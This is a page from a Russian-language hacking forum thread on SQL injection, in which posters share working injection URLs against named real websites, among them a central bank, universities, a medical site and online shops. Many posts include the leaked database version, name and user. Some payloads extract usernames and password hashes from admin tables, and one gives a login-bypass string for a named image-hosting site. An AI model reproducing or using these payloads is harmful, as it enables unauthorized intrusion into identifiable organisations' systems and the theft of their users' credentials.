SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Продолжу тему авиации-теперь сайт по продаже самолетов :D

    Code:
    http://www.businessair.ru/info/news.php?id=-375+union+select+1,user(),3,4,5,6+--+
     
    1 person likes this.
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://skydot.lanl.gov

    для получения данных используют SQL запросы(точнее только select)...

    http://skydot.lanl.gov/nsvs/nsvs.php

    без комментариев...
     
    _________________________
    1 person likes this.
  3. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    http://teh-rezina.ru/?id=999+union+select+1,user(),version(),4,5,6

    5.0.51a-24+lenny1
    trezina@localhost

    ----------

    http://oleg-stecenko.biz.ua/index.php?show=product&cat=135&im=&par3=&par4=&par2=&pid=-1+union+select+1,2,3,4,5,6,7,8,version(),10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35

    oleg@localhost:5.0.24
     
    #12643 Darth Padla, 16 Aug 2010
    Last edited by a moderator: 16 Aug 2010
  4. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Bank of Afghanistan

    Code:
    http://www.centralbank.gov.af/CompleteNewsDescription.php?NewsId=-13+union+ALL+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
    ---
    Version: 5.0.91-community
    Database: cbank_dabwebsite
    User: cbank_root@localhost
    ---

    п.с ..за мной выехали ..ы
     
    #12644 Дирижабль, 16 Aug 2010
    Last edited: 16 Aug 2010
    5 people like this.
  5. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    ТИЦ 10 PR 3
     
  6. shuba

    shuba Elder - Старейшина

    Joined:
    22 May 2009
    Messages:
    593
    Likes Received:
    129
    Reputations:
    52
    Code:
    http://www.moodiereport.com/category.php?id=-31+union+select+1,2,3,GROUP_CONCAT%28concat_ws%280x3a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723E%29,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+
     
  7. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    PR 3
    Code:
    http://www.worldnet-intl.com/services.php?id=3&&s=-9%20Union%20Select%201,database%28%29,3,4,5,6,7,8,9,10%20--
    Version = 5.0.51a-24+lenny4
    Database = worldnet_db
    User = [email protected]

    Code:
    http://www.franchisetoown.com/franchise_detail.php?id=412+and+1=0+%20Union%20Select%20%201,2,3,4,5,6,7,8,9,10,11,12,13,UNHEX%28HEX%28version%28%29%29%29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20--
    Version = 5.0.41-community-log
    User = [email protected]
    Database = franchi_fto
     
    #12647 TELO, 16 Aug 2010
    Last edited: 16 Aug 2010
  8. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    723
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.pucp.edu.pe/puntoedu/index.php?option=com_categorias&cat=-30+UNION+SELECT+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users%20limit%200,1--


    Code:
    http://www.pucp.edu.pe/puntoedu/index.php?option=com_categorias&cat=-30+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users%20limit%200,1--
    Version: bd_puntoedu
    Database: 5.0.77
    Username: ]puntoedu_user@localhost

    Google PR: 7

    Второй пароль на админке...
     
    #12648 av1, 16 Aug 2010
    Last edited by a moderator: 16 Aug 2010
    1 person likes this.
  9. shuba

    shuba Elder - Старейшина

    Joined:
    22 May 2009
    Messages:
    593
    Likes Received:
    129
    Reputations:
    52
    Code:
    http://www.localfirstaz.com/directory/view-cat.php?id=-23+union+select+1,2,3,GROUP_CONCAT%28concat_ws%280x3a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723E%29+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+
     
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://mombaby.med.unc.edu/index.php?c=2&s=58&p=-333+union/*ii*/select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9+from+information_schema.columns--

    http://www.corpusgallery.com/exhibitions.php?id=-21'+union+select+1,2,3,version(),5,6,7/*
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.digitalcarversguild.com/plugin.php?ProductId=-18+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
    http://www.maverickentertainment.cc/filmdetail.php?ProductID=724+and+ascii(lower(substring(user(),1,1)))=109
    http://www.eonclash.com/ViewProduct.php?ProductID=-26+union+select+1,2,concat(username,char(58),user_password),4,5,6,7,8+from+users
     
    _________________________
    #12651 Konqi, 17 Aug 2010
    Last edited: 17 Aug 2010
    1 person likes this.
  12. Мор0к

    Мор0к Member

    Joined:
    4 Aug 2010
    Messages:
    7
    Likes Received:
    7
    Reputations:
    1
    PR5

    http://www.rtuni.org/extendedschools/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,version(),9--

    Database Version: 5.0.90-community
    Database name: bbritton_rtu
    User name: bbritton_root@localhost
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.positivenetworks.com/page.php?pageID=3'+or+(1,1)=(select+count(0),concat((select+table_name+from+information_schema.tables+where+table_name=(select+table_name+from+information_schema.tables+where+table_rows>ascii(lower(substring(version(),1,1)))limit+0,1)+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

    :D
     
    _________________________
    2 people like this.
  14. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    723
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=-336+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
    Version: 5.0.22-Debian_0ubuntu6.06.2-log
    Database: personal
    Username: inb@localhost

    Google PR: 5
     
  15. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    PR 1

    ТИЦ 60 PR 3

    ТИЦ 80 PR 3

    ТИЦ 10 PR 4

    ТИЦ 80 PR 2

    PR 3

    ТИЦ 20 PR 2
    Шоп
     
    #12655 -PRIVAT-, 17 Aug 2010
    Last edited: 17 Aug 2010
    2 people like this.
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://youronesourcefitness.com/trainers.php?id=30+union+select+concat_ws(0x3a,@@version,@@version_compile_os,@@version_comment,@@version_compile_machine),2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2

    http://www.limelight-software.com/article.php?id=-59+union+select+1,2,aes_decrypt(aes_encrypt(version(),1),1),4,5,6,7

    http://www.yangdentalgroup.net/nl/article.php?id=1512;select+version()::int,null,null,null,null,null,null,null,null,null,null,null,null,null,null&type=col

    http://www.unitedpurpose.org/archive/article.php?id=100+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13+from+information_schema.`tables`+where+table_schema=database()

    http://www.duesseldorf.feg.de/static/sebalu2/article.php?id=-48+union+select+1,2,3,4,5,6,7,8,9

    http://www.israel-diaspora.info/article.php?id=-853+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13

    http://www.eleganthomesinwesttoronto.com/ShowResources.cfm?Pageid=(select+top+1+table_name+from+information_schema.tables)&TypeOfPage=2

    http://www.musicforpercussion.com/php/NewsDetail.php?ID=-130+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14--

    http://www.odessachamber.com/newsdetail.php?id=14'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

    http://www.dkggroup.com/newsdetail.php?id=165+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

    http://www.tango04.com/news/newsdetail.php?id=-361+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13

    http://www.dutchtub.com/english00/newsdetail.php?id=-207+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34&titel=eco_gadget_of_the_year!

    http://www.marmoon.com/games.php?id=-437+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13

    http://www.dakamericas.com/newsdetail.php?id=19'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

    http://www.bathfringe.co.uk/page.php?pageid=38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31&PHPSESSID='2ebe0d1ced95240449e5f9ec7bb9219c
     
    _________________________
    4 people like this.
  17. so_newbie

    so_newbie Member

    Joined:
    6 Jul 2010
    Messages:
    33
    Likes Received:
    14
    Reputations:
    9
    Code:
    http://www.iccu.sbn.it/genera.jsp?id=-1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by++concat(mid(version(),1,63),+floor(rand(0)*2)))--+
    
    PR - 7

    ps. кому не лень, можете и докрутить ;-)

    Небольшой хостинг картинок
    Code:
    http://pixca.ru/login.php
    
    sql inj в POST данных. логика запроса SELECT * FROM ??? WHERE (login = '#login#') and (password = '#password#').
    можно зайти под любым пользователем : D

    l: #login#') or 1=1#
    p: put smth here
     
    2 people like this.
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.eonclash.com/ViewProduct.php?ProductID=27+and+substring(version(),1,1)=4

    http://www.rdmarket.ru/index.php?productID=1492'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+17,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

    http://stroymag.kiev.ua/index.php?productID=342+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.columns+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

    http://www.vk4ajj.com/cubecart/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((select+password+from+CubeCart_admin_users+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
    (http://www.vk4ajj.com/cubecart/modules/3rdparty/Estelles_Mod_Store/css/php.ini)

    http://www.eventphotocards.com/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
     
    _________________________
    2 people like this.
  19. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,176
    Likes Received:
    617
    Reputations:
    690
    Шоп
    http://www.fitshop.de/de/kategorie/riegel/18/index.html?br[0]=4+and+row(1,2)in(select+count(*),concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+where+column_name+like+0x257061737325+limit+1,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.columns+x+group+by+a)

    Script: /de/kategorie/riegel/18/index.html?
    http://fitshop.de/sqladmin/
    хеши в соседном разделе.
     
    _________________________
    #12659 shell_c0de, 18 Aug 2010
    Last edited: 18 Aug 2010
    1 person likes this.
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    продолжаем шопы :)

    http://www.gskpiter.ru/index.php?productID=36+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
     
    _________________________
Thread Status:
Not open for further replies.